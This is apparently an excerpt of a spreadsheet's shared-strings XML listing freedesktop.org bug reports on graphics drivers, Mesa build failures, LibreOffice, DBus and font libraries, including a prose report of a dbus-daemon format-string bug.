    <t>DBUS-99999</t>
  </si>
  <si>
    <t>Typo fixes to sd-activation test</t>
  </si>
  <si>
    <t>Two trivial patches attached courtesy of Coverity.
(Are these the first reports itâ€™s produced for non-pre-existing issues?)
(If itâ€™s of interest Coverity produced four reports for the sd-activation changes: two were false positives where it detected infinite loops which werenâ€™t actually infinite due to callbacks in the main context and these two.)</t>
  </si>
  <si>
    <t>POPPLER-13738</t>
  </si>
  <si>
    <t>Some images rendered incorrectly</t>
  </si>
  <si>
    <t>In a document that I will attach soon after creating this bug Adobe Reader 8 for Linux correctly displays some images that Evince does not - I suppose that's a poppler bug.
As you can see from screenshots instead of the images Evince displays white-filled rectangles with black borders.
Attachments coming in few minutes.</t>
  </si>
  <si>
    <t>DRI-94174</t>
  </si>
  <si>
    <t>Intel Broadwell intel_cpu_fifo_underrun_irq_handler</t>
  </si>
  <si>
    <t>Kernel 4.5.0-rc4 x86_64
Laptop TOSHIBA SATELLITE Z30-B with Intel Broadwell: Intel(R) Core(TM) i5-5200U CPU @ 2.20GHz
Error in the logs: 
[drm:intel_cpu_fifo_underrun_irq_handler [i915]] *ERROR* CPU pipe C FIFO underrun
[drm:intel_cpu_fifo_underrun_irq_handler [i915]] *ERROR* CPU pipe A FIFO underrun
[drm:intel_cpu_fifo_underrun_irq_handler [i915]] *ERROR* CPU pipe B FIFO underrun
With 2 external monitors attached (HDMI and VGA) the VGA display goes blank for a second and comes back.
A strange is that the VGA monitor is detected as eDP.
I will attach dmesg with 'drm.debug=0x1e log_buf_len=1M' on the kernel command line xrandr --verbose and Xorg.0.log.</t>
  </si>
  <si>
    <t>a.titeica</t>
  </si>
  <si>
    <t>DRI-40508</t>
  </si>
  <si>
    <t>[snb DP] 27 inch iMac as displayport monitor doesn't work</t>
  </si>
  <si>
    <t>Created attachment 50752
kernel log with drm.debug=0x06
System:
Intel 2600K
Intel DH67GD motherboard
Ubuntu Oneiric with 3.0.0-9-generic-pae kernel
Apple 27 iMac connected as an external monitor via displayport.
On boot the iMac switches to the displayport input and shows the motherboard boot screen and grub but the screen goes dark when it gets into the graphical part of the boot and stays that way.
I have also tried with the Fedora 16 alpha live  disk and the same thing seems to happen.</t>
  </si>
  <si>
    <t>MESA-74892</t>
  </si>
  <si>
    <t>HyperZ GPU lockup with radeonsi 7970M PITCAIRN and Distance Alpha game</t>
  </si>
  <si>
    <t>The kernel people at https://bugzilla.kernel.org/show_bug.cgi?id=70411 told me this needs to be fixed in mesa so here it is.
The interesting part:
01:00.0 VGA compatible controller: Advanced Micro Devices Inc. [AMD/ATI] Wimbledon XT [Radeon HD 7970M]
Latest mesa git but has probably been happening since HyperZ was enabled by default.
dmesg is attached there: https://bugzilla.kernel.org/attachment.cgi?id=125651
It's reproducible every time so I can later get more detail. For now there's the dmesg: Starting the game and showing some intro works but shortly before displaying the menu X freezes for a few seconds and after it is usable again I see the stuff starting at 82688.801309 in dmesg.
HyperZ seems to work fine for everything else I have tried so far. It only happens in the Distance Alpha that's only (officially) available to kickstarter backers.</t>
  </si>
  <si>
    <t>LIBREOFFICE-80222</t>
  </si>
  <si>
    <t>File Association catches old MS formats during default installation</t>
  </si>
  <si>
    <t>Installation of LO 4.3.0.1_Win_x86 on Windows 7 Professional beside a valid Office 2010 and with an existing 4.2.x. All on default.
All the older MS-Office-files (97-2003 format) are associated with LO.
The newer XML-Formats remain untouched.
Expected: All MS-formats should be left to MS-Office.</t>
  </si>
  <si>
    <t>merschmann</t>
  </si>
  <si>
    <t>LIBREOFFICE-63123</t>
  </si>
  <si>
    <t>dir *.ext return same result as dir * but it shudnot!</t>
  </si>
  <si>
    <t xml:space="preserve">Looking with macro for a specific file which part name is in cell in specific path return all files in that path. In version 3.6.4 the same macro work just fine (it return only the file which was looking for)!
Macro sample:
function  cpy_impl(partName As String) As string
    Dim startPath as String
	dim xfil as string
    Dim FileX as String
    cpy_impl =  
    startPath = d:\My Documents\_scan\ZAH\ 		'direktorij kjer se iÅ¡Äe datoteko'
	ending = *.pdf 		'*.txt je privzeto za konÄnice txt'
  rem Xfil = (converttourl(startPath &amp; (partName + ending)))
  Xfil = ((startPath &amp; (partName + ending)))
    FileX = ( Dir (Xfil))
   While (FileX  )
         cpy_impl = cpy_impl + FileX +  
         FileX = Dir
   Wend
End function 
</t>
  </si>
  <si>
    <t>skunst55</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-81418</t>
  </si>
  <si>
    <t>new org mailing list for the libre graphics meeting</t>
  </si>
  <si>
    <t>hi
for the last three years we enjoyed having an LGM list at freedekstop!
but with the time more and more people have subscribed to it and it has become a general list about the LGM. since it's not an organisation list anymore we started again sending CCs... that's evil!
so it's time for an -org list!
can you please create a libregraphicsmeeting-org (or any other name that better fits your schemas) for us?
ciao
a.l.e</t>
  </si>
  <si>
    <t>ale.comp_06</t>
  </si>
  <si>
    <t>LIBREOFFICE-57254</t>
  </si>
  <si>
    <t>FILESAVE: hidden text visible in xhtml export</t>
  </si>
  <si>
    <t>Text with font effect Hidden is not marked as hidden in the xhtml export.</t>
  </si>
  <si>
    <t>XORG-11289</t>
  </si>
  <si>
    <t>DMA queue hang: dmaPut=bc6 current=b80 status=0 with the 2d driver</t>
  </si>
  <si>
    <t>When using the driver on Fedora 7 without 3d using the official packages from red -hat leads me to this error.
Xorg.0.log http://rafb.net/p/wgR3Bk19.html
Snip of /var/log/messages for the dri errors http://rafb.net/p/n894F685.html
lspci -vvv http://rafb.net/p/uSfAPK48.html</t>
  </si>
  <si>
    <t>wesley.hearn</t>
  </si>
  <si>
    <t>MESA-105510</t>
  </si>
  <si>
    <t>Unable to build swrAVX@sha/rasterizer_core_threads.cpp</t>
  </si>
  <si>
    <t>I have bisected this failure to the following commit:
commit de0d10db93d85de79c7b4451c4851ace2976f8f4
Author: Apple SWE 
Date:   Tue Mar 13 18:24:26 2018 -0700
    Add processor topology calculation implementation for Darwin/OSX targets.
Full output from build failure:
23:00:35 FAILED: src/gallium/drivers/swr/swrAVX@sha/rasterizer_core_threads.cpp.o 
23:00:35 ccache g++  -Isrc/gallium/drivers/swr/swrAVX@sha -Isrc/gallium/drivers/swr -I../src/gallium/drivers/swr -Isrc/gallium/drivers/swr/rasterizer -I../src/gallium/drivers/swr/rasterizer -I../src/gallium/drivers/swr/rasterizer/archrast -Isrc/gallium/drivers/swr/rasterizer/jitter -I../src/gallium/drivers/swr/rasterizer/jitter -Isrc/gallium/drivers/swr/rasterizer/core -I../src/gallium/drivers/swr/rasterizer/core -Isrc/gallium/drivers/swr/rasterizer/codegen -I../src/gallium/drivers/swr/rasterizer/codegen -Isrc/gallium/drivers/swr/rasterizer/core/backends -I/usr/lib/llvm-4.0/include -fdiagnostics-color=always -pipe -D_FILE_OFFSET_BITS=64 -Wall -Winvalid-pch -Wnon-virtual-dtor -std=c++11 -O2 -g '-DVERSION=18.1.0-devel' -DPACKAGE_VERSION=VERSION '-DPACKAGE_BUGREPORT=https://bugs.freedesktop.org/enter_bug.cgi?product=Mesa' -DGLX_USE_TLS -DHAVE_ST_VDPAU -DENABLE_ST_OMX_BELLAGIO -DHAVE_X11_PLATFORM -DGLX_INDIRECT_RENDERING -DGLX_DIRECT_RENDERING -DGLX_USE_DRM -DHAVE_DRM_PLATFORM -DHAVE_SURFACELESS_PLATFORM -DENABLE_SHADER_CACHE -DHAVE___BUILTIN_BSWAP32 -DHAVE___BUILTIN_BSWAP64 -DHAVE___BUILTIN_CLZ -DHAVE___BUILTIN_CLZLL -DHAVE___BUILTIN_CTZ -DHAVE___BUILTIN_EXPECT -DHAVE___BUILTIN_FFS -DHAVE___BUILTIN_FFSLL -DHAVE___BUILTIN_POPCOUNT -DHAVE___BUILTIN_POPCOUNTLL -DHAVE___BUILTIN_UNREACHABLE -DHAVE_FUNC_ATTRIBUTE_CONST -DHAVE_FUNC_ATTRIBUTE_FLATTEN -DHAVE_FUNC_ATTRIBUTE_MALLOC -DHAVE_FUNC_ATTRIBUTE_PURE -DHAVE_FUNC_ATTRIBUTE_UNUSED -DHAVE_FUNC_ATTRIBUTE_WARN_UNUSED_RESULT -DHAVE_FUNC_ATTRIBUTE_WEAK -DHAVE_FUNC_ATTRIBUTE_FORMAT -DHAVE_FUNC_ATTRIBUTE_PACKED -DHAVE_FUNC_ATTRIBUTE_RETURNS_NONNULL -DHAVE_FUNC_ATTRIBUTE_VISIBILITY -DHAVE_FUNC_ATTRIBUTE_ALIAS -DHAVE_FUNC_ATTRIBUTE_NORETURN -DUSE_SSE41 -DUSE_GCC_ATOMIC_BUILTINS -DUSE_X86_64_ASM -DMAJOR_IN_SYSMACROS -DHAVE_SYS_SYSCTL_H -DHAVE_LINUX_FUTEX_H -DHAVE_STRTOF -DHAVE_MKOSTEMP -DHAVE_POSIX_MEMALIGN -DHAVE_TIMESPEC_GET -DHAVE_MEMFD_CREATE -DHAVE_STRTOD_L -DHAVE_DLADDR -DHAVE_DL_ITERATE_PHDR -DHAVE_LIBDRM -DHAVE_ZLIB -DHAVE_PTHREAD -DHAVE_LLVM=0x0400 -DMESA_LLVM_VERSION_PATCH=1 -DHAVE_WAYLAND_PLATFORM -DWL_HIDE_DEPRECATED -DHAVE_DRI3 -Wall -fno-math-errno -fno-trapping-math -Wno-non-virtual-dtor -fPIC -D__STDC_CONSTANT_MACROS -D_GNU_SOURCE -D__STDC_FORMAT_MACROS -D__STDC_LIMIT_MACROS -pthread -fvisibility=hidden -fno-strict-aliasing -mavx -DKNOB_ARCH=KNOB_ARCH_AVX -MD -MQ 'src/gallium/drivers/swr/swrAVX@sha/rasterizer_core_threads.cpp.o' -MF 'src/gallium/drivers/swr/swrAVX@sha/rasterizer_core_threads.cpp.o.d' -o 'src/gallium/drivers/swr/swrAVX@sha/rasterizer_core_threads.cpp.o' -c ../src/gallium/drivers/swr/rasterizer/core/threads.cpp
23:00:35 ../src/gallium/drivers/swr/rasterizer/core/threads.cpp:268:18: error: â€˜sysctlbynameâ€™ was not declared in this scope
23:00:35      int result = sysctlbyname(hw.packages 
23:00:35                   ^~~~~~~~~~~~
23:00:35 ../src/gallium/drivers/swr/rasterizer/core/threads.cpp:268:18: note: suggested alternative: â€˜ttynameâ€™
23:00:35      int result = sysctlbyname(hw.packages 
23:00:35                   ^~~~~~~~~~~~
23:00:35                   ttyname
23:00:35 In file included from ../src/gallium/drivers/swr/rasterizer/common/os.h:267:0
23:00:35                  from ../src/gallium/drivers/swr/rasterizer/core/threads.cpp:44:
23:00:35 ../src/gallium/drivers/swr/rasterizer/common/swr_assert.h:65:26: error: expected unqualified-id before â€˜doâ€™
23:00:35  #define _SWR_MACRO_START do {
23:00:35                           ^
23:00:35 ../src/gallium/drivers/swr/rasterizer/common/swr_assert.h:131:5: note: in expansion of macro â€˜_SWR_MACRO_STARTâ€™
23:00:35      _SWR_MACRO_START \
23:00:35      ^~~~~~~~~~~~~~~~
23:00:35 ../src/gallium/drivers/swr/rasterizer/common/swr_assert.h:151:41: note: in expansion of macro â€˜_SWR_ASSERTâ€™
23:00:35  #define SWR_ASSERT(e ...)              _SWR_ASSERT(true e ##__VA_ARGS__)
23:00:35                                          ^~~~~~~~~~~
23:00:35 ../src/gallium/drivers/swr/rasterizer/core/threads.cpp:269:5: note: in expansion of macro â€˜SWR_ASSERTâ€™
23:00:35      SWR_ASSERT(result == 0)
23:00:35      ^~~~~~~~~~
23:00:35 ../src/gallium/drivers/swr/rasterizer/common/swr_assert.h:68:7: error: expected unqualified-id before â€˜whileâ€™
23:00:35      } while(0)          \
23:00:35        ^
23:00:35 ../src/gallium/drivers/swr/rasterizer/common/swr_assert.h:138:5: note: in expansion of macro â€˜_SWR_MACRO_ENDâ€™
23:00:35      _SWR_MACRO_END
23:00:35      ^~~~~~~~~~~~~~
23:00:35 ../src/gallium/drivers/swr/rasterizer/common/swr_assert.h:151:41: note: in expansion of macro â€˜_SWR_ASSERTâ€™
23:00:35  #define SWR_ASSERT(e ...)              _SWR_ASSERT(true e ##__VA_ARGS__)
23:00:35                                          ^~~~~~~~~~~
23:00:35 ../src/gallium/drivers/swr/rasterizer/core/threads.cpp:269:5: note: in expansion of macro â€˜SWR_ASSERTâ€™
23:00:35      SWR_ASSERT(result == 0)
23:00:35      ^~~~~~~~~~
23:00:35 ../src/gallium/drivers/swr/rasterizer/core/threads.cpp:270:5: error: â€˜numPhysicalIdsâ€™ does not name a type
23:00:35      numPhysicalIds = value
23:00:35      ^~~~~~~~~~~~~~
23:00:35 ../src/gallium/drivers/swr/rasterizer/core/threads.cpp:272:5: error: â€˜resultâ€™ does not name a type
23:00:35      result = sysctlbyname(hw.logicalcpu 
23:00:35      ^~~~~~
23:00:35 In file included from ../src/gallium/drivers/swr/rasterizer/common/os.h:267:0
23:00:35                  from ../src/gallium/drivers/swr/rasterizer/core/threads.cpp:44:
23:00:35 ../src/gallium/drivers/swr/rasterizer/common/swr_assert.h:65:26: error: expected unqualified-id before â€˜doâ€™
23:00:35  #define _SWR_MACRO_START do {
23:00:35                           ^
23:00:35 ../src/gallium/drivers/swr/rasterizer/common/swr_assert.h:131:5: note: in expansion of macro â€˜_SWR_MACRO_STARTâ€™
23:00:35      _SWR_MACRO_START \
23:00:35      ^~~~~~~~~~~~~~~~
23:00:35 ../src/gallium/drivers/swr/rasterizer/common/swr_assert.h:151:41: note: in expansion of macro â€˜_SWR_ASSERTâ€™
23:00:35  #define SWR_ASSERT(e ...)              _SWR_ASSERT(true e ##__VA_ARGS__)
23:00:35                                          ^~~~~~~~~~~
23:00:35 ../src/gallium/drivers/swr/rasterizer/core/threads.cpp:273:5: note: in expansion of macro â€˜SWR_ASSERTâ€™
23:00:35      SWR_ASSERT(result == 0)
23:00:35      ^~~~~~~~~~
23:00:35 ../src/gallium/drivers/swr/rasterizer/common/swr_assert.h:68:7: error: expected unqualified-id before â€˜whileâ€™
23:00:35      } while(0)          \
23:00:35        ^
23:00:35 ../src/gallium/drivers/swr/rasterizer/common/swr_assert.h:138:5: note: in expansion of macro â€˜_SWR_MACRO_ENDâ€™
23:00:35      _SWR_MACRO_END
23:00:35      ^~~~~~~~~~~~~~
23:00:35 ../src/gallium/drivers/swr/rasterizer/common/swr_assert.h:151:41: note: in expansion of macro â€˜_SWR_ASSERTâ€™
23:00:35  #define SWR_ASSERT(e ...)              _SWR_ASSERT(true e ##__VA_ARGS__)
23:00:35                                          ^~~~~~~~~~~
23:00:35 ../src/gallium/drivers/swr/rasterizer/core/threads.cpp:273:5: note: in expansion of macro â€˜SWR_ASSERTâ€™
23:00:35      SWR_ASSERT(result == 0)
23:00:35      ^~~~~~~~~~
23:00:35 ../src/gallium/drivers/swr/rasterizer/core/threads.cpp:274:5: error: â€˜numProcessorsâ€™ does not name a type
23:00:35      numProcessors = value
23:00:35      ^~~~~~~~~~~~~
23:00:35 ../src/gallium/drivers/swr/rasterizer/core/threads.cpp:276:5: error: â€˜resultâ€™ does not name a type
23:00:35      result = sysctlbyname(hw.physicalcpu 
23:00:35      ^~~~~~
23:00:35 In file included from ../src/gallium/drivers/swr/rasterizer/common/os.h:267:0
23:00:35                  from ../src/gallium/drivers/swr/rasterizer/core/threads.cpp:44:
23:00:35 ../src/gallium/drivers/swr/rasterizer/common/swr_assert.h:65:26: error: expected unqualified-id before â€˜doâ€™
23:00:35  #define _SWR_MACRO_START do {
23:00:35                           ^
23:00:35 ../src/gallium/drivers/swr/rasterizer/common/swr_assert.h:131:5: note: in expansion of macro â€˜_SWR_MACRO_STARTâ€™
23:00:35      _SWR_MACRO_START \
23:00:35      ^~~~~~~~~~~~~~~~
23:00:35 ../src/gallium/drivers/swr/rasterizer/common/swr_assert.h:151:41: note: in expansion of macro â€˜_SWR_ASSERTâ€™
23:00:35  #define SWR_ASSERT(e ...)              _SWR_ASSERT(true e ##__VA_ARGS__)
23:00:35                                          ^~~~~~~~~~~
23:00:35 ../src/gallium/drivers/swr/rasterizer/core/threads.cpp:277:5: note: in expansion of macro â€˜SWR_ASSERTâ€™
23:00:35      SWR_ASSERT(result == 0)
23:00:35      ^~~~~~~~~~
23:00:35 ../src/gallium/drivers/swr/rasterizer/common/swr_assert.h:68:7: error: expected unqualified-id before â€˜whileâ€™
23:00:35      } while(0)          \
23:00:35        ^
23:00:35 ../src/gallium/drivers/swr/rasterizer/common/swr_assert.h:138:5: note: in expansion of macro â€˜_SWR_MACRO_ENDâ€™
23:00:35      _SWR_MACRO_END
23:00:35      ^~~~~~~~~~~~~~
23:00:35 ../src/gallium/drivers/swr/rasterizer/common/swr_assert.h:151:41: note: in expansion of macro â€˜_SWR_ASSERTâ€™
23:00:35  #define SWR_ASSERT(e ...)              _SWR_ASSERT(true e ##__VA_ARGS__)
23:00:35                                          ^~~~~~~~~~~
23:00:35 ../src/gallium/drivers/swr/rasterizer/core/threads.cpp:277:5: note: in expansion of macro â€˜SWR_ASSERTâ€™
23:00:35      SWR_ASSERT(result == 0)
23:00:35      ^~~~~~~~~~
23:00:35 ../src/gallium/drivers/swr/rasterizer/core/threads.cpp:278:5: error: â€˜numCoresâ€™ does not name a type
23:00:35      numCores = value
23:00:35      ^~~~~~~~
23:00:35 ../src/gallium/drivers/swr/rasterizer/core/threads.cpp:280:5: error: â€˜out_nodesâ€™ does not name a type
23:00:35      out_nodes.resize(numPhysicalIds)
23:00:35      ^~~~~~~~~
23:00:35 ../src/gallium/drivers/swr/rasterizer/core/threads.cpp:282:5: error: expected unqualified-id before â€˜forâ€™
23:00:35      for (auto physId = 0 physId &lt; numPhysicalIds ++physId)
23:00:35      ^~~
23:00:35 ../src/gallium/drivers/swr/rasterizer/core/threads.cpp:282:27: error: â€˜physIdâ€™ does not name a type
23:00:35      for (auto physId = 0 physId &lt; numPhysicalIds ++physId)
23:00:35                            ^~~~~~
23:00:35 ../src/gallium/drivers/swr/rasterizer/core/threads.cpp:282:52: error: expected unqualified-id before â€˜++â€™ token
23:00:35      for (auto physId = 0 physId &lt; numPhysicalIds ++physId)
23:00:35                                                     ^~
23:00:35 ../src/gallium/drivers/swr/rasterizer/core/threads.cpp:301:5: error: â€˜out_numThreadsPerProcGroupâ€™ does not name a type
23:00:35      out_numThreadsPerProcGroup = 0
23:00:35      ^~~~~~~~~~~~~~~~~~~~~~~~~~
23:00:35 ../src/gallium/drivers/swr/rasterizer/core/threads.cpp:303:5: error: expected unqualified-id before â€˜forâ€™
23:00:35      for (auto &amp;node : out_nodes)
23:00:35      ^~~
23:00:36 [1861/2766] Compiling C++ object 'src/gallium/drivers/swr/swrAVX@sha/rasterizer_memory_StoreTile.cpp.o'.
23:00:38 [1862/2766] Compiling C++ object 'src/gallium/drivers/swr/swrAVX@sha/rasterizer_core_binner.cpp.o'.
23:00:39 [1863/2766] Compiling C++ object 'src/gallium/drivers/swr/swrAVX@sha/rasterizer_core_pa_avx.cpp.o'.
23:00:39 [1864/2766] Compiling C++ object 'src/gallium/drivers/swr/swrAVX@sha/meson-generated_.._rasterizer_core_backends_gen_BackendPixelRate2.cpp.o'.
23:00:39 [1865/2766] Compiling C++ object 'src/gallium/drivers/swr/swrAVX@sha/rasterizer_core_clip.cpp.o'.
23:00:39 [1866/2766] Compiling C++ object 'src/gallium/drivers/swr/swrAVX@sha/meson-generated_.._rasterizer_core_backends_gen_BackendPixelRate0.cpp.o'.
23:00:39 [1867/2766] Compiling C++ object 'src/gallium/drivers/swr/swrAVX@sha/meson-generated_.._rasterizer_core_backends_gen_BackendPixelRate3.cpp.o'.
23:00:40 [1868/2766] Compiling C++ object 'src/glx/tests/glx-test@exe/indirect_api.cpp.o'.
23:00:40 [1869/2766] Compiling C++ object 'src/gallium/drivers/swr/swrAVX@sha/meson-generated_.._rasterizer_core_backends_gen_BackendPixelRate1.cpp.o'.
23:00:41 [1870/2766] Compiling C++ object 'src/gallium/drivers/swr/swrAVX@sha/rasterizer_memory_ClearTile.cpp.o'.
23:00:41 [1871/2766] Compiling C++ object 'src/gallium/drivers/swr/swrAVX@sha/rasterizer_core_backend_singlesample.cpp.o'.
23:00:42 [1872/2766] Compiling C++ object 'src/gallium/drivers/swr/swrAVX@sha/rasterizer_core_frontend.cpp.o'.
23:00:50 [1873/2766] Compiling C++ object 'src/gallium/drivers/swr/swrAVX@sha/meson-generated_.._rasterizer_core_backends_gen_rasterizer0.cpp.o'.
23:00:51 [1874/2766] Compiling C++ object 'src/gallium/drivers/swr/swrAVX@sha/meson-generated_.._rasterizer_core_backends_gen_rasterizer2.cpp.o'.
23:00:51 [1875/2766] Compiling C++ object 'src/gallium/drivers/swr/swrAVX@sha/meson-generated_.._rasterizer_core_backends_gen_rasterizer1.cpp.o'.
23:00:53 [1876/2766] Compiling C++ object 'src/gallium/drivers/swr/swrAVX@sha/meson-generated_.._rasterizer_core_backends_gen_rasterizer3.cpp.o'.
23:01:04 [1877/2766] Compiling C++ object 'src/gallium/drivers/swr/swrAVX@sha/rasterizer_core_backend_sample.cpp.o'.
23:01:04 ninja: build stopped: subcommand failed.
23:01:04 ERROR: command failed
23:01:04 ERROR: creating a failing test: mesa-meson-buildtest : Command '['ninja' '-j' '18' '-C'</t>
  </si>
  <si>
    <t>MESA-60447</t>
  </si>
  <si>
    <t>[ivb steam] Counter-Strike: Source rendering glitches</t>
  </si>
  <si>
    <t>Vertex(?) corruption or something like it running CS:S.
Donâ€™t have the chipset myself so I cannot give further information but I can pass this report on from steamâ€™s issue tracker.
https://github.com/ValveSoftware/steam-for-linux/issues/1333</t>
  </si>
  <si>
    <t>XORG-23461</t>
  </si>
  <si>
    <t>X crashes with some GTK apps</t>
  </si>
  <si>
    <t>Created attachment 28850
Log of X crashing
I have seen X crash if I start epiphany-webkit or if I try to change the references in monodevelop the border of the window gets drawn but when the app tries to paint the inside of the window X crashes.
 This doesn't happen with epiphany-gecko gnome-console skype pidgin or almost any other app.
 This is with the Debian/unstable version and noveau from git from yesterday. Might running git X help?</t>
  </si>
  <si>
    <t>MEDIA-PLAYER-INFO-30672</t>
  </si>
  <si>
    <t>Add Sansa Clip</t>
  </si>
  <si>
    <t>Created attachment 39251
Patch adding Sansa Clip
see attached patch</t>
  </si>
  <si>
    <t>CAIRO-12787</t>
  </si>
  <si>
    <t>Use a larger scaled glyph cache for CJK languages</t>
  </si>
  <si>
    <t>Profiles indicate that for CJK languages glyphs get scaled too frequently because the default cache is too small:
http://www.gnome.org/~federico/news-2007-10.html#pango-cjk-1
cairo-scaled-font.c has this:
#define MAX_GLYPHS_CACHED_PER_FONT 256
and it includes a comment that it would be better to have a cache shared across all fonts with a random replacement policy.
Simply increasing this value to 2048 gives very good results with the pango-profile benchmark scaling glyphs went from using about 60% of the time to only using about 13%.
This bug is a reminder that a cache shared across shared fonts is desirable.</t>
  </si>
  <si>
    <t>XORG-1273</t>
  </si>
  <si>
    <t>Bump major version of libXaw</t>
  </si>
  <si>
    <t>As described in the links below the architecture board voted to bump the major
version number of the libXaw library.
http://freedesktop.org/pipermail/release-wranglers/2004-August/000970.html
http://freedesktop.org/pipermail/release-wranglers/2004-September/000982.html</t>
  </si>
  <si>
    <t>FONTCONFIG-17014</t>
  </si>
  <si>
    <t>Excessive number of allocations during FcSortWalk()</t>
  </si>
  <si>
    <t>Created attachment 18161
Reduce number of allocations during FcSortWalk
The current behaviour of FcSortWalk() is to create a new FcCharSet on
each iteration that is the union of the previous iteration with the next
FcCharSet in the font set. This causes the existing FcCharSet to be
reproduced in its entirety and then allocates fresh leaves for the new
FcCharSet. In essence the number of allocations is quadratic wrt the
number of fonts required.
By introducing a new method for merging a new FcCharSet with an existing
one we can change the behaviour to be effectively linear with the number
of fonts - allocating no more leaves than necessary to cover all the
fonts in the set.
For example profiling 'gedit UTF-8-demo.txt'
    Allocator		    nAllocs	    nBytes
Before:
    FcCharSetFindLeafCreate 62886	    2012352
    FcCharSetPutLeaf        9361	    11441108
After:
    FcCharSetFindLeafCreate 1940	    62080
    FcCharSetPutLeaf        281		    190336
The savings are even more significant for applications like firefox-3.0b5
which need to switch between large number of fonts.
Before:
    FcCharSetFindLeafCreate 4461192	    142758144
    FcCharSetPutLeaf	    1124536	    451574172
After:
    FcCharSetFindLeafCreate 80359	    2571488
    FcCharSetPutLeaf	    18940	    9720522
Just to need to verify that the output of FcSortWalk() is not changed.</t>
  </si>
  <si>
    <t>MESA-8704</t>
  </si>
  <si>
    <t>Mesa CVS compile error when CHAN_BITS = 32</t>
  </si>
  <si>
    <t>Following compile errors :
swrast/s_span.c:292: error: invalid operands to binary &gt;&gt;
swrast/s_span.c:293: error: invalid operands to binary &gt;&gt;
swrast/s_span.c:294: error: invalid operands to binary &gt;&gt;
swrast/s_span.c:324: error: invalid operands to binary &gt;&gt;
swrast/s_span.c:325: error: invalid operands to binary &gt;&gt;
swrast/s_span.c:326: error: invalid operands to binary &gt;&gt;
Happen when CHAN_BITS = 32 which means that:
  CHAN_TYPE becomes GL_FLOAT
And &gt;&gt; operator isn't valid.</t>
  </si>
  <si>
    <t>seanlkml</t>
  </si>
  <si>
    <t>TANGO-7764</t>
  </si>
  <si>
    <t>icon-naming-utils: edit-select-all isn't in legacy-icon-mapping.xml.</t>
  </si>
  <si>
    <t>leacy-icon-mapping.xml : Please add edit-select-all
stock_select-all in gnome.</t>
  </si>
  <si>
    <t>DBUS-98157</t>
  </si>
  <si>
    <t>format string vulnerability processing ActivationFailure messages</t>
  </si>
  <si>
    <t>While trying to fix all the compiler warnings (Bug #97357) I tried enabling -Wsuggest-attribute=format and found this:
---
dbus-daemon listens for ActivationFailure signals coming from systemd. When running with --systemd-activation these signals are used to report that systemd could not activate a D-Bus service for us when not using --systemd-activation they are still processed.
dbus-daemon passes the human-readable message contained in these signals to dbus_set_error() where a format string is expected. In principle this could lead to arbitrary memory overwrite via a format string attack in the message received from systemd resulting in arbitrary code execution.
I believe this is not an exploitable security vulnerability on the system bus in practice: it can only be exploited by the owner of the org.freedesktop.systemd1 bus name which is restricted to uid 0 so if systemd is attacker-controlled then the system is already doomed. Similarly if a systemd system unit mentioned in the activation failure message has an attacker-controlled name then the attacker likely already has sufficient access to execute arbitrary code as root in any case.
However prior to dbus 1.8.16 and 1.9.10 due to a missing check for systemd's identity unprivileged processes could forge activation failure messages which would have gone through this code path. We thought at the time that this was a denial of service vulnerability (CVE-2015-0245) this bug means that it was in fact potentially an arbitrary code execution vulnerability.
Bug found using -Wsuggest-attribute=format and -Wformat-security.</t>
  </si>
  <si>
    <t>LIBREOFFICE-75460</t>
  </si>
  <si>
    <t>UI: Autoscroll using middle mouse button doesn't work when enabled since 4.1.</t>
  </si>
  <si>
    <t>Problem description: 
This only effects Writer. Calc works without issue. I have enabled autsoscroll in options and I cannot middle click to autoscroll. Other applications in the LO suite and other applications like Firefox work without issue. I'm on Ubuntu 13.10 using the supplied builds from https://launchpad.net/~libreoffice/+archive/ppa to run into this issue. It would also be helpful if people using 4.2 on Windows and those using official Linux builds from the LO website tested this. To see if the issue is specific to Ubuntu or Linux or if it affects every platform. 
Steps to reproduce:
1. Enable autoscroll via Tools &gt; Options &gt; LibreOffice &gt; View &gt; Mouse and set Middle Mouse button to Automatic Scrolling
2. Click OK.
3. Try middle clicking on a document in Writer and see if autoscroll works. In my case it doesn't.
Current behavior:
Expected behavior:
Operating System: Ubuntu
Version: 4.2.0.4 release
Last worked in: 4.1.4.2 release</t>
  </si>
  <si>
    <t>helgalo94</t>
  </si>
  <si>
    <t>LIBREOFFICE-39586</t>
  </si>
  <si>
    <t>[FILEOPEN] Writer crashes or hangs when try to open .docx file</t>
  </si>
  <si>
    <t>Created attachment 49605
testfile valgrind log strace log
Tested on:
- OpenOffice 3.2 (exact version missing) // Windows
- LibreOffice 3.3.3 OOO330m19 (Build:301) // Ubuntu package 1:3.3.3-1ubuntu2
- LibreOffice 3.4.0 OOO340m1 (Build:12)  // WinXP
- LibreOffice 3.4.1 OOO340m1 (Build:103) // WinXP
- LibreOffice 3.4.1 OOO340m1 (Build:103) // Archlinux
Crashes and try to restore file on next startup.
+ LibreOffice 3.3.3.1 OOO330m19 (Build 301) // WinXP
Works but shows only one page from 35.
In attachment - testfile and some usefull logs (strace + valgrind).
If i can help anything else - ask me.</t>
  </si>
  <si>
    <t>ad_user</t>
  </si>
  <si>
    <t>LIBREOFFICE-53604</t>
  </si>
  <si>
    <t>error in saving empty footnote in RTF format</t>
  </si>
  <si>
    <t>I generated a file in Microsoft Word 2011 for mac in .rtf form.  I edited it in Libre Office Writer.  When saving in .rtf form quotes apostrophes and long dashes were lost.
I will update.  Maybe that will help.</t>
  </si>
  <si>
    <t>aebarschall</t>
  </si>
  <si>
    <t>LIBREOFFICE-57353</t>
  </si>
  <si>
    <t>EMF import prob - EMR_MOVETOEX does not always create new subpath</t>
  </si>
  <si>
    <t>Path recording sequences like 27 88 27 88... do not yield the same visual result when doing a FILLPATH as 27 88 61 27 88... although it should (at least MSO &amp; Windows do).
Can't easily attach sample file it's copyrighted - anyone wanting to test this please poke me privately.</t>
  </si>
  <si>
    <t>XORG-14597</t>
  </si>
  <si>
    <t>randr12 failures on 12 powerbooks and workarounds</t>
  </si>
  <si>
    <t>As has been reported several times on irc in the past (dating back to december at least) randr12 is still not working on powerbooks. I decided to have a good look at it and tried to find the issues by comparing registers in the randr and non-randr state.
OpenFirmware posts the card and by default sets up a 1024x768 mode only 8 bit color however. For some reason powerbooks have the internal LVDS on CRTC1. When plugging an exernal analog TFT screen it flashes white during OF init but stays black after that. randr2 was able to correctly recognize it. The problem seemed only to happen with the internal LVDS.
Post of BIOS image Xorg log reg traces and initial patch follow.
Danny</t>
  </si>
  <si>
    <t>DBUS-71820</t>
  </si>
  <si>
    <t>a small fix for API doc: @log_name --&gt; @param log_name</t>
  </si>
  <si>
    <t>This was introduced by me. :-( now here is the patch.</t>
  </si>
